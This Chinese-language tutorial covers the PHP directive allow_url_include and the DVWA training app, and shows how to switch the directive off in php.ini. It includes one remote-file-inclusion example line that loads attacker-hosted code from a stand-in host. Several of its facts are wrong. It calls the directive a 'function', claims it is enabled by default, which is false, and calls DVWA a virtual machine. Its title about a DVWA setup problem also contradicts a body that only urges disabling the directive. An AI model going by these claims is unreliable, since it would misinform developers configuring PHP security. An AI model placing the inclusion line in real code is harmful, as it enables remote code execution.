MySQL DVWA设置：PHP函数allow_url_include：已禁用

在本文中，我们将介绍MySQL DVWA设置中的一个问题。具体来说，我们将关注PHP函数allow_url_include被禁用的情况。

阅读更多：MySQL 教程

什么是allow_url_include?

allow_url_include是PHP中的一个函数，允许通过URL使用include和require函数。该函数在默认情况下启用，但是在安全性方面会存在一定的问题。因此，一些安全意识更高的网站管理者会选择将此功能禁用。

然而，在某些情况下，禁用allow_url_include可能会影响到某些应用程序的正常运行，如DVWA。

DVWA是什么？

DVWA（Damn Vulnerable Web Application）是一个用于测试Web应用程序和渗透测试技巧的虚拟机。它提供了一个漏洞丰富的Web应用程序，旨在帮助安全人员和Web开发人员学习应用程序攻击的不同技术。

为什么要禁用allow_url_include？

禁用allow_url_include可以增加Web应用程序的安全性。这是因为允许通过URL加载外部代码将导致一个问题，即可能会导致攻击者注入恶意代码。攻击者可以将恶意代码放在他们自己控制的服务器上，然后通过URL将其注入到Web应用程序中。

例如，以下PHP代码是允许通过URL加载文件的：

<?php include "https://example.com/malicious_code.php"; ?>

如果这个网站的allow_url_include被启用，那么攻击者可以在他们控制的服务器上放置一个名为malicious_code.php的文件，其中包含一些恶意PHP代码。然后，攻击者可以使用上述代码将文件加载到受攻击的网站中，导致恶意代码被执行。

如何禁用allow_url_include？

这里提供的是一种方法，可能并不严谨。也因此，禁用allow_url_include并不一定是一个完美可靠的解决办法。因此，建议您在使用自定义应用程序之前仔细学习和测试。

首先，需要找到php.ini文件并编辑之。在Ubuntu系统中，在终端中键入以下命令：

sudo nano /etc/php/7.2/apache2/php.ini

然后，您需要找到以下行：

allow_url_include = On

将其更改为：

allow_url_include = Off

保存并退出文件。最后，您需要重新启动Apache服务，以使更改生效。

sudo service apache2 restart

总结

虽然禁用allow_url_include可以增加Web应用程序的安全性，但这并不是一个完美的解决办法。在使用自定义应用程序之前，建议您进行充分的学习和测试。此外，对于那些没有受过安全培训的Web开发人员来说，禁用allow_url_include并不能完全解决安全问题。因此，我们强烈建议所有Web开发人员、安全人员和站点管理员积极寻求更好的安全解决方案，以防止网站发生安全问题。